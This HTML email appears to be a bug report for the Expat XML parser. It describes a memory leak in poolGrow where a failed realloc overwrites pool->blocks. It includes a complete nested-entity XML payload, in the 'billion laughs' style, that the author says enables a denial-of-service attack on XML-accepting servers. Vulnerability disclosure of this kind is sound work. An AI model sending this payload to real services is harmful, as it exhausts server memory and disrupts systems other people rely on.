<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=us-ascii">
<META content="MSHTML 6.00.2900.5880" name=GENERATOR></HEAD>
<BODY>
<DIV>
<DIV><SPAN class=790075923-23022010><FONT face=Arial size=2>poolGrow in
xml.parse.cpp has the following block of code:</FONT></SPAN></DIV>
<DIV><SPAN class=790075923-23022010><FONT face=Arial
size=2></FONT></SPAN> </DIV>
<DIV><SPAN class=790075923-23022010>
<DIV><SPAN class=790075923-23022010><FONT face=Arial size=2> if
(pool->blocks && pool->start == pool->blocks->s)
{<BR> int blockSize = (int)(pool->end -
pool->start)*2;<BR> pool->blocks = (BLOCK
*)<BR>
pool->mem->realloc_fcn(pool->blocks,<BR>
(offsetof(BLOCK,
s)<BR>
+ blockSize * sizeof(XML_Char)));<BR> if (pool->blocks ==
NULL)<BR> return XML_FALSE;<BR>
pool->blocks->size = blockSize;<BR> pool->ptr =
pool->blocks->s + (pool->ptr - pool->start);<BR>
pool->start = pool->blocks->s;<BR> pool->end =
pool->start + blockSize;<BR> }<BR></FONT></SPAN></DIV>
<DIV><SPAN class=790075923-23022010><FONT face=Arial size=2>It looks like this
will cause a memory leak if realloc_fcn returns NULL because pool->blocks
will be overwritten but the old memory area to which it pointed won't be
freed.</FONT></SPAN></DIV>
<DIV><SPAN class=790075923-23022010><FONT face=Arial
size=2></FONT></SPAN> </DIV>
<DIV><SPAN class=790075923-23022010><FONT face=Arial size=2>The
other places where reallocation is done in this file (via the REALLOC
macro) don't have this bug because they correctly store the result in a
temporary variable.</FONT></SPAN></DIV>
<DIV><SPAN class=790075923-23022010><FONT face=Arial
size=2></FONT></SPAN> </DIV>
<DIV><SPAN class=790075923-23022010><FONT face=Arial
size=2></FONT></SPAN> </DIV>
<DIV><SPAN class=790075923-23022010><FONT face=Arial
size=2></FONT></SPAN> </DIV>
<DIV><SPAN class=790075923-23022010><SPAN class=184213719-24022010><FONT
face=Arial size=2>This bug allows a serious DOS attack on a server that accepts
XML-based requests if a request is seen of the following
form:</FONT></SPAN></SPAN></DIV>
<DIV><SPAN class=790075923-23022010><SPAN class=184213719-24022010><FONT
face=Arial size=2><FONT face="Times New Roman" size=3><!DOCTYPE foo
[<BR><!ENTITY a "1234567890" ><BR><!ENTITY b
"&a;&a;&a;&a;&a;&a;&a;&a;" ><BR><!ENTITY c
"&b;&b;&b;&b;&b;&b;&b;&b;" ><BR><!ENTITY d
"&c;&c;&c;&c;&c;&c;&c;&c;" ><BR><!ENTITY e
"&d;&d;&d;&d;&d;&d;&d;&d;" ><BR><!ENTITY f
"&e;&e;&e;&e;&e;&e;&e;&e;" ><BR><!ENTITY g
"&f;&f;&f;&f;&f;&f;&f;&f;" ><BR><!ENTITY h
"&g;&g;&g;&g;&g;&g;&g;&g;" ><BR><!ENTITY i
"&h;&h;&h;&h;&h;&h;&h;&h;" ><BR><!ENTITY j
"&i;&i;&i;&i;&i;&i;&i;&i;" ><BR><!ENTITY k
"&j;&j;&j;&j;&j;&j;&j;&j;" ><BR><!ENTITY l
"&k;&k;&k;&k;&k;&k;&k;&k;" ><BR><!ENTITY m
"&l;&l;&l;&l;&l;&l;&l;&l;" ><BR><!ENTITY n
"&m;&m;&m;&m;&m;&m;&m;&m;"
><BR>]><BR><foo
bar="&n;"/></FONT><BR></FONT></SPAN></SPAN></DIV>
<DIV><SPAN class=790075923-23022010><SPAN class=184213719-24022010><FONT
face=Arial size=2>When the attribute is expanded, the realloc (assuming that it
bounds the size of the request) will fail, leaking the buffer from before the
realloc.</FONT></SPAN></SPAN></DIV>
<DIV><SPAN class=790075923-23022010><SPAN class=184213719-24022010><FONT
face=Arial size=2></FONT></SPAN></SPAN> </DIV>
<DIV><SPAN class=790075923-23022010><SPAN class=184213719-24022010><FONT
face=Arial size=2></FONT></SPAN></SPAN> </DIV>
<DIV><SPAN class=790075923-23022010><SPAN class=184213719-24022010><FONT
face=Arial size=2>This bug was also present in older versions (e.g.
1.95.8)</DIV></FONT></SPAN></SPAN></SPAN></DIV></DIV></BODY></HTML>